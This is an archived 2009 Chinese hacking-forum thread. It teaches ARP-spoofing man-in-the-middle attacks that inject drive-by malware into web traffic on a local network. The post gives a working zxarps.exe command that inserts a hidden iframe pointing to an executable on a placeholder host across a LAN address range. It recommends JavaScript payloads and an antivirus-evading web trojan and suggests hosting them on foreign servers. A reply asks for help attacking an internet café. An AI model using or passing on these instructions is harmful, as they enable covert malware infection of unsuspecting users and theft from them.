Board logo

标题: arp欺骗挂马 [打印本页]

作者: dsa3027235    时间: 2009-5-24 19:35     标题: arp欺骗挂马

arp 挂马算是一个新出的挂马方式 网上的资料觉的还是很少
所以就整理一下发出来

简单讲下arp欺骗

通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,

但这样存在局限性:1.管理员经常不登陆,那么要很久才能监听到密码

目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很

难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.

不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句.


正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.

arp挂马的工具现在非常少  

个人认为LZX开发的zxarps.exe非常好 11K超级小 命令行下工具

个人感觉命令行下的工具速度非常快 这个工具跟arpsniffer一样需要安

装winpacp驱动  

如果是单纯的ARP嗅探我还是推荐cain 以前没怎么用过 用过一次才知道 真是好东西 不用安装驱动 可视化界面  

在DOS下输入zxarps.exe就会有帮助信息  

具体的我就不说了我只说一下挂马的参数  

比如自己的机器是192.168.2.14

就输入zxarps.exe -idx 0 -ip 192.168.2.13-192.168.2.60 -port 80  

-insert "<iframe src=http://www.xxx.cn/xx.exe width=0 height=0>". 这样192.168.2.13-192.168.2.60 中间任何一台主机打开网页就会发现被插入挂马代码

挂马的代码大家非常熟悉了 这里-idx 0 是网卡索引号 看几块网卡了  

-port 80就是在80端口 后面就是挂马的地址 有时候会扫不到alive host或者扫到的很少 大家换下IP范围就可以了 成功后会显示sniffering..

还有就是用iframe打开挂马页面会是空白 但是刚才问了下呆子 他说是可以的

不过还是建议大家用JS挂马 网马现在还是06014免杀版的中马率比较  

大家都去国外的服务器挂吧 哈哈 就说这么多 累死我了 大家支持下
作者: 591225640    时间: 2009-10-19 14:12

你能把详细经过告诉我吗包裹生成网吗我们这一个网吧可以弄ARP攻击




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2